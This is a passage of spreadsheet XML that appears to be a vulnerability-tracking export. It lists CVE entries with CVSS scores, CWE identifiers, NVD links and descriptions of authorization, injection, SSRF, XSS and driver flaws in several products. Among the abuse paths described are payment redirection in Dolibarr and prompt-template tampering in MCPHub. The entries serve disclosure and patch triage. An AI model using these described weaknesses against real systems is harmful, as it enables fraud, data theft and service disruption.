      <c r="F1270" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1270" s="5" t="inlineStr"/>
      <c r="H1270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1270" s="5" t="inlineStr"/>
      <c r="J1270" s="5" t="inlineStr"/>
      <c r="K1270" s="5" t="inlineStr"/>
      <c r="L1270" s="5" t="inlineStr"/>
      <c r="M1270" s="5" t="inlineStr"/>
      <c r="N1270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1270" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1270" s="5" t="inlineStr"/>
      <c r="Q1270" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1270" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. From 5.0.0 until 5.5.2, Kirby's REST API chunk upload handler in src/Api/Upload.php did not run the relevant upload authorization preflight in Kirby\Api\Upload::process() before Kirby\Api\Upload::processChunk() persisted chunk data. An authenticated user with the access.panel permission enabled but with files.create, files.replace, and user/users.update permissions disabled could submit requests with an Upload-Length header and leave unfinished chunks in site/cache/.uploads for 24 hours. Repeating this process could consume attacker-controlled temporary storage, prevent other users from uploading files, or prevent site logic from storing data, although final permission checks still prevented unauthorized files from reaching the content or site/accounts directories. This issue is fixed in version 5.5.2.</t>
        </is>
      </c>
      <c r="S1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71415</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71505</t>
        </is>
      </c>
      <c r="D1271" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1271" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1271" s="5" t="inlineStr"/>
      <c r="H1271" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1271" s="5" t="inlineStr"/>
      <c r="J1271" s="5" t="inlineStr"/>
      <c r="K1271" s="5" t="inlineStr"/>
      <c r="L1271" s="5" t="inlineStr"/>
      <c r="M1271" s="5" t="inlineStr"/>
      <c r="N1271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1271" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1271" s="5" t="inlineStr"/>
      <c r="Q1271" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1271" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API third-party site account write routes that allows authenticated attackers with third-party creation rights to overwrite the WebPortal password of any company by bypassing per-object access checks that are only enforced on read routes. Attackers can replace the victim company's WebPortal password through the write endpoint, authenticate as that company to access its invoice data, and also obtain the victim's previous password verifier from the API response.</t>
        </is>
      </c>
      <c r="S1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71505</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71507</t>
        </is>
      </c>
      <c r="D1272" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1272" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1272" s="5" t="inlineStr"/>
      <c r="H1272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1272" s="5" t="inlineStr"/>
      <c r="J1272" s="5" t="inlineStr"/>
      <c r="K1272" s="5" t="inlineStr"/>
      <c r="L1272" s="5" t="inlineStr"/>
      <c r="M1272" s="5" t="inlineStr"/>
      <c r="N1272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1272" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1272" s="5" t="inlineStr"/>
      <c r="Q1272" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1272" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API company bank account write routes that allows authenticated attackers with third-party creation rights to create, replace, or delete bank account details of any company without requiring read access to that company. Attackers can inject attacker-controlled IBANs as creditor accounts, which are then written into regenerated SEPA credit-transfer files, redirecting outgoing payments to attacker-controlled accounts.</t>
        </is>
      </c>
      <c r="S1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71507</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71508</t>
        </is>
      </c>
      <c r="D1273" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1273" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1273" s="5" t="inlineStr"/>
      <c r="H1273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1273" s="5" t="inlineStr"/>
      <c r="J1273" s="5" t="inlineStr"/>
      <c r="K1273" s="5" t="inlineStr"/>
      <c r="L1273" s="5" t="inlineStr"/>
      <c r="M1273" s="5" t="inlineStr"/>
      <c r="N1273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1273" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1273" s="5" t="inlineStr"/>
      <c r="Q1273" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1273" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the user REST API update endpoint that allows attackers with user-write rights to modify payroll fields by exploiting an incomplete credential denylist that omits payroll columns. Attackers can rewrite salary, bonus, hourly rate, daily rate, and weekly hours for any user without holding payroll rights, with the modified values appearing in payroll export reports.</t>
        </is>
      </c>
      <c r="S1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71508</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71509</t>
        </is>
      </c>
      <c r="D1274" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1274" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1274" s="5" t="inlineStr"/>
      <c r="H1274" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1274" s="5" t="inlineStr"/>
      <c r="J1274" s="5" t="inlineStr"/>
      <c r="K1274" s="5" t="inlineStr"/>
      <c r="L1274" s="5" t="inlineStr"/>
      <c r="M1274" s="5" t="inlineStr"/>
      <c r="N1274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1274" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1274" s="5" t="inlineStr"/>
      <c r="Q1274" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1274" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the expense report REST API update endpoint that allows authenticated attackers with expense-creation rights to bypass the approval workflow by directly setting approval status and approver identity fields. Attackers can manipulate workflow state fields through the REST API to advance expense reports to approved or closed status without possessing the dedicated approval right, while also creating forensic inconsistencies in audit records due to missing approval timestamps.</t>
        </is>
      </c>
      <c r="S1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71509</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71511</t>
        </is>
      </c>
      <c r="D1275" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1275" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1275" s="5" t="inlineStr"/>
      <c r="H1275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1275" s="5" t="inlineStr"/>
      <c r="J1275" s="5" t="inlineStr"/>
      <c r="K1275" s="5" t="inlineStr"/>
      <c r="L1275" s="5" t="inlineStr"/>
      <c r="M1275" s="5" t="inlineStr"/>
      <c r="N1275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1275" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1275" s="5" t="inlineStr"/>
      <c r="Q1275" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R1275" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a sensitive data exposure vulnerability in the Members REST API that allows authenticated attackers with member-read rights to retrieve bcrypt password verifiers by querying member endpoints. Attackers can call the individual member or member list endpoints to obtain crypted password verifier fields that are not filtered by the base API serializer or the Members API class, potentially enabling offline password cracking attacks.</t>
        </is>
      </c>
      <c r="S1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71511</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="D1276" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1276" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1276" s="5" t="inlineStr"/>
      <c r="H1276" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1276" s="5" t="inlineStr"/>
      <c r="J1276" s="5" t="inlineStr"/>
      <c r="K1276" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L1276" s="5" t="inlineStr"/>
      <c r="M1276" s="5" t="inlineStr"/>
      <c r="N1276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1276" s="5" t="inlineStr"/>
      <c r="Q1276" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R1276" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="S1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76223</t>
        </is>
      </c>
      <c r="D1277" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1277" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1277" s="5" t="inlineStr"/>
      <c r="H1277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1277" s="5" t="inlineStr"/>
      <c r="J1277" s="5" t="inlineStr"/>
      <c r="K1277" s="5" t="inlineStr"/>
      <c r="L1277" s="5" t="inlineStr"/>
      <c r="M1277" s="5" t="inlineStr"/>
      <c r="N1277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1277" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P1277" s="5" t="inlineStr"/>
      <c r="Q1277" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1277" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB (com.arcadedb) versions 26.7.3 and earlier fail to enforce the UPDATE_SCHEMA permission check when a DEFINE FUNCTION statement targets an already-existing function library. A user with only database access can add or overwrite SQL or Cypher functions in an existing library and persist the change, enabling tampering with admin-defined function logic. The issue is fixed in 26.8.1. (JavaScript functions still trigger the UPDATE_SECURITY check and are not affected.)</t>
        </is>
      </c>
      <c r="S1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76223</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77125</t>
        </is>
      </c>
      <c r="D1278" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1278" s="5" t="inlineStr">
        <is>
          <t>103e4ec9-0a87-450b-af77-479448ddef11</t>
        </is>
      </c>
      <c r="G1278" s="5" t="inlineStr"/>
      <c r="H1278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1278" s="5" t="inlineStr"/>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr"/>
      <c r="L1278" s="5" t="inlineStr"/>
      <c r="M1278" s="5" t="inlineStr"/>
      <c r="N1278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1278" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1278" s="5" t="inlineStr"/>
      <c r="Q1278" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1278" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Sonatype Nexus Repository 3 in which two blobstore group management REST API endpoints did not correctly enforce the intended authorization check. A user granted only the nexus:blobstores:create permission could invoke these endpoints to convert an existing blobstore into a group blobstore, an action that should require the nexus:blobstores:update permission instead. This could result in unauthorized modification of blobstore configuration without administrator approval. The nexus:blobstores:create permission is a named permission that must be explicitly granted by an administrator; it is not held by default.</t>
        </is>
      </c>
      <c r="S1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77125</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77939</t>
        </is>
      </c>
      <c r="D1279" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1279" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1279" s="5" t="inlineStr"/>
      <c r="H1279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1279" s="5" t="inlineStr"/>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr"/>
      <c r="L1279" s="5" t="inlineStr"/>
      <c r="M1279" s="5" t="inlineStr"/>
      <c r="N1279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1279" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1279" s="5" t="inlineStr"/>
      <c r="Q1279" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="R1279" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS through v1.0.0-dev contains an expression language injection vulnerability that allows authenticated attackers with a valid API token to read arbitrary files by passing unsanitized user-supplied input to the Symfony ExpressionLanguage engine via the POST /api/v1/query endpoint. Attackers can leverage exposed application objects including filesystem() and serializers() within the evaluation scope to read arbitrary server files and achieve conditional remote code execution if a PHP file can be placed on disk through a secondary vector.</t>
        </is>
      </c>
      <c r="S1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77939</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79745</t>
        </is>
      </c>
      <c r="D1280" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1280" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1280" s="5" t="inlineStr"/>
      <c r="H1280" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1280" s="5" t="inlineStr"/>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr"/>
      <c r="L1280" s="5" t="inlineStr"/>
      <c r="M1280" s="5" t="inlineStr"/>
      <c r="N1280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1280" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1280" s="5" t="inlineStr"/>
      <c r="Q1280" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1280" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, the built-in prompt and resource controllers perform no role checking. The mutating POST/PUT /api/prompts* and POST/PUT /api/resources* routes are attached to the authenticated router with no admin gate, and the handlers never read req.user. The DAO singletons they write are consulted first — ahead of any connected MCP server — for every session in handleGetPromptRequest / handleReadResourceRequest. A non-admin can therefore create, overwrite, and shadow global prompt templates and resources that all other users are served. The scored impact is the unauthorized integrity violation (creation/tampering/shadowing of globally-served records); stored prompt injection into other users' LLM sessions is a downstream consequence of that tampering. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="S1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79745</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79747</t>
        </is>
      </c>
      <c r="D1281" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1281" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1281" s="5" t="inlineStr"/>
      <c r="H1281" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1281" s="5" t="inlineStr"/>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr"/>
      <c r="L1281" s="5" t="inlineStr"/>
      <c r="M1281" s="5" t="inlineStr"/>
      <c r="N1281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1281" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P1281" s="5" t="inlineStr"/>
      <c r="Q1281" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1281" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, an authenticated non-admin user can register a server pointing at an arbitrary URL and make the hub issue server-side requests to it, with no egress filtering (no block of loopback / RFC1918 / link-local 169.254.0.0/16). Via the OpenAPI proxy path the response body is returned to the caller (full, reflected SSRF); via the SSE/streamable-http transport the request is sent blind. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="S1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79747</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80117</t>
        </is>
      </c>
      <c r="D1282" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1282" s="5" t="inlineStr"/>
      <c r="H1282" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1282" s="5" t="inlineStr"/>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr"/>
      <c r="L1282" s="5" t="inlineStr"/>
      <c r="M1282" s="5" t="inlineStr"/>
      <c r="N1282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1282" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1282" s="5" t="inlineStr"/>
      <c r="Q1282" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="R1282" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to issue arbitrary IN and OUT instructions to any x86 I/O port due to missing allowlist or port validation on exposed IOCTLs. Attackers can obtain a device handle and write to sensitive ports including the PS/2 controller port, CPU reset ports, CMOS configuration ports, and interrupt controller ports to cause an immediate system reset or other hardware-level manipulation from a standard user account.</t>
        </is>
      </c>
      <c r="S1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80117</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81404</t>
        </is>
      </c>
      <c r="D1283" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1283" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1283" s="5" t="inlineStr"/>
      <c r="H1283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1283" s="5" t="inlineStr"/>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr"/>
      <c r="L1283" s="5" t="inlineStr"/>
      <c r="M1283" s="5" t="inlineStr"/>
      <c r="N1283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1283" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1283" s="5" t="inlineStr"/>
      <c r="Q1283" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1283" s="5" t="inlineStr">
        <is>
          <t>The IPGP Visitors Origin WordPress plugin before 1.6 does not sanitise or escape user input before reflecting it back in the HTTP response, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against users who are tricked into submitting a crafted request.</t>
        </is>
      </c>
      <c r="S1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81404</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81781</t>
        </is>
      </c>
      <c r="D1284" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1284" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1284" s="5" t="inlineStr"/>
      <c r="H1284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1284" s="5" t="inlineStr"/>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr"/>
      <c r="L1284" s="5" t="inlineStr"/>
      <c r="M1284" s="5" t="inlineStr"/>
      <c r="N1284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1284" s="5" t="inlineStr"/>
      <c r="Q1284" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1284" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t>
        </is>
      </c>
      <c r="S1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81798</t>
        </is>
      </c>
      <c r="D1285" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1285" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G1285" s="5" t="inlineStr"/>
      <c r="H1285" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1285" s="5" t="inlineStr"/>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr"/>
      <c r="L1285" s="5" t="inlineStr"/>
      <c r="M1285" s="5" t="inlineStr"/>
      <c r="N1285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1285" s="5" t="inlineStr"/>
      <c r="Q1285" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1285" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.
This issue affects Easy Appointments: from n/a through 4.0.2.1.</t>
        </is>
      </c>
      <c r="S1285" s="6" t="inlineStr">
        <is>
